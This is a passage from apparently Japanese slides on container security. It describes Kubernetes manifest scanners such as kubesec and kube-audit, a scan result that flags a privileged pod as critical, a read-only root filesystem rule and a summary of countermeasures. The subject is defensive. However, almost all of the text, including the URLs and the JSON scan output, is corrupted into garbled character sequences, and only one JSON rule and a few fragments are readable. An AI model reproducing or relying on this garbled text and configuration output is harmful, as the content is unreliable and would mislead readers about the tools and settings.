  38. Πϝʔδͷ৔߹ͱಉ༷ɺ͍͘ΒηΩϡϦςΟΛҙࣝͯ͠ίϯςφىಈઃఆΛ࡞੒ͨ͠ͱͯ͠΋ɺ ҙਤͤͣةݥͳઃఆΛؚΜͰ͠·͏Մೳੑ͸͋Γ·͢ɻ ,VCFSOFUFT.BOJGFTUʹ͍ͭͯ΋ηΩϡϦςΟϦεΫΛධՁ͢ΔͨΊͷεΩϟϯπʔϧ͕ଘࡏ͠·͢ɻ ˙୅දతͳ,VCFSOFUFT.BOJGFTUεΩϟϯπʔϧ ɾ,VCFSOFUFT.BOJGFTUʹؚ·ΕΔηΩϡϦςΟ ɹϦεΫΛݕ஌Ͱ͖Δ ɾϚχϑΣετͷࣗಈमਖ਼͕Մೳ ɾՔಇதͷ1PEʹର͢ΔεΩϟϯ͕Մೳ IUUQTHJUIVCDPNDPOUSPMQMBOFJPLVCFTFD IUUQTHJUIVCDPN4IPQJGZLVCFBVEJU

    ɾ,VCFSOFUFT.BOJGFTUͷઃఆ߲໨ΛείΞ෇ͯ͠ ɹηΩϡϦςΟϦεΫΛධՁ͢Δ ɾ$-*Ҏ֎ʹ)551αʔόʔͱͯ͠εΩϟϯػೳΛ ɹఏڙ͢Δ͜ͱ͕Մೳ LVCFBVEJU☁🔒💪 ,VCFTFD ϚχϑΣετΛεΩϟϯ͢Δ ˞͜͜Ͱ͸୅දతͳ044ͷΠϝʔδεΩϟϯπʔϧΛྫͱ͍ͯࣔͯ͠͠·͕͢͜Ε͕ਖ਼ղͱ͍͏ҙਤͰ͸͋Γ·ͤΜɻ ɹ·ͨΫϥελϨΠϠͷ࿩ʹͳΓ·͕͢ɺద༻ՄೳͳઃఆΛ01"ͳͲϙϦγʔΛ༻੍͍ͯޚ͢Δͱ͍ͬͨखஈ΋ߟ͑ΒΕ·͢ɻ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ରࡦ
  39. ,VCFTFDΛ༻͍ͯ,VCFSOFUFT.BOJGFTUΛεΩϟϯ͢Δ͜ͱͰɺҎԼͷΑ͏ʹίϯςφىಈઃఆͷධՁΛߦ͏͜ͱ͕Ͱ͖·͢ɻ ࠓճͷ߈ܸͷओཁҼͱͳͬͨ1SJWJMFHFEઃఆ͕$SJUJDBMͰݕ஌͞Ε͍ͯΔଞɺ ִ཭ੑΛߴΊΔͨΊͷਪ঑ઃఆ͕BEWJTFͱͯ͠ݕ஌͞Ε͍ͯΔ͜ͱ͕෼͔Γ·͢ɻ LVCFTFDTDBOXFCJOTFDVSFQPEZNM < \ PCKFDU1PEXFCJOTFDVSFEFGBVMU  WBMJEUSVF 

     fi MF/BNFXFCJOTFDVSFQPEZNM  NFTTBHF'BJMFEXJUIBTDPSFPGQPJOUT  TDPSF  TDPSJOH\ DSJUJDBM< \ JE1SJWJMFHFE  TFMFDUPSDPOUBJOFST<>TFDVSJUZ$POUFYUQSJWJMFHFEUSVF  SFBTPO1SJWJMFHFEDPOUBJOFSTDBOBMMPXBMNPTUDPNQMFUFMZVOSFTUSJDUFEIPTUBDDFTT  QPJOUT ^ >  BEWJTF< \ JE"QQBSNPS"OZ  TFMFDUPSNFUBEBUBBOOPUBUJPOTaDPOUBJOFSBQQBSNPSTFDVSJUZCFUBLVCFSOFUFTJPOHJOYa  SFBTPO8FMMEF fi OFE"QQ"SNPSQPMJDJFTNBZQSPWJEFHSFBUFSQSPUFDUJPOGSPNVOLOPXOUISFBUT8"3/*/(/05130%6$5*0/3&"%:  QPJOUT ^  ɾ ɾ ɾ { "id": "ReadOnlyRootFilesystem", "selector": "containers[] .securityContext .readOnlyRootFilesystem == true", "reason": "An immutable root filesystem can prevent malicious binaries being added to PATH and increase attack cost", "points": 1 }, ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ରࡦ
  40. /P ରࡦ ৄࡉ  ෆཁͳઃఆΛߦΘͳ͍ ,VCFSOFUFTͰ͸ಛʹઃఆΛߦΘͳͯ͘΋࠷௿ݶͷִ཭ੑ͸୲อ͞ΕΔ ˞ಛʹҙຯΛཧղͤͣઃఆΛ௥Ճ͢Δͱίϯςφͷִ཭ੑΛ௿Լͤ͞ΔڪΕ͕͋Δ  ΑΓִ཭ੑΛߴΊΔઃఆ ϓϥΫςΟεΛࢀߟʹΑΓִ཭ੑΛߴΊΔͨΊͷઃఆΛ௥Ճ͢Δ

    ίϯςφͷ࣮ߦϢʔβʔΛඇSPPUʹઃఆ͢Δ  ىಈઃఆͷεΩϟϯ ִ཭ੑΛ௿Լͤ͞Δةݥͳઃఆ͕ͳ͍͔πʔϧΛ༻͍ͯ֬ೝ͢Δ ηΩϡϦςΟରࡦ·ͱΊ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ରࡦ